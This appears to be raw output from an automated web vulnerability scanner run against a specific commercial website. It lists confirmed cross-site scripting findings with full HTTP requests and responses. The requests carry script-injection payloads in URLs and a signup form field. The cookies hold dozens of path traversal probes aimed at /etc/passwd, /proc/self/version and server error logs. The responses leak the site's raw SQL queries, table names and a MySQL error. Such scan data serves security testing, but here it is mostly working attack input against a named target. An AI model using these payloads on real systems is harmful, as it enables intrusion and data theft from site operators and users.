- /ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E

/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013B5)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013B5)</script>

Request

GET /ppc/leadflow/style/dhtmlwindow.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013B5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9ficpcvlmj4usqub33hc7t8bi6; path=/
Content-Length: 3093
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>' OR prj.project_page_url = 'leadflow/style/dhtmlwindow.css'"--></style></script><script>netsparker(0x0013B5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013B5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E

/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013BD)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013BD)</script>

Request

GET /ppc/leadflow/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013BD)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/style/dhtmlwindow.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=55pdhfu6a9j277np3g62dcp805; path=/
Content-Length: 2943
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>' OR prj.project_page_url = 'leadflow/style/'"--></style></script><script>netsparker(0x0013BD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013BD)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST '"--></style></script><script>alert(0x00137E)</script>
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 256
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00137E)%3c%2fscript%3e&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:23 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=999F98F6E9BB3C737B6612458EEA3F38; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


